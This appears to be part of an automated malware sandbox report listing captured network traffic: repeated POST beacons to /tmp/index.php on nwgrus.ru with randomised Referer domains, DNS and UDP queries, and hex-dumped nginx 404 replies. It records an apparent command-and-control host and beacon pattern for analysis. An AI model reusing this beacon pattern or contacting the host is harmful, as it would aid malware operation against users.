      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vthbbsgwufn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xohyaostsydxib.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wbpwgsalvbneixte.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pbysepknkik.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ijtbudkgjdatnpve.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rjwxfpemkdjwjc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hnrmgadlbbkwfam.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wdfbqkdpkrjmiy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://atckbbeeuxiymh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cijofmhyocrj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mvcnjjhpwrjug.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gjrfgywovwumgreo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://duklicrioxv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ukjjgoqtxsrmcmnl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kevwooyenkvj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kyqpufsslxgu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gtfiwdiocoxv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wtloyxdgfedr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jrasjcgaikr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wqumsknhwrx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uqdrqkhpcmcglann.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qxdbxtuaolo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nobwwkshognvggkp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gafhlilcplomq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mwqmbajulrg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wtfbpeudtpjocvd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lkewxsecdko.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sxnddulhpoyubn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://suevwuleoceiaguq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dyetfqbcutdwehk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: nwgrus.ru
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
      Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://procusohdnplkcl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 e9 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
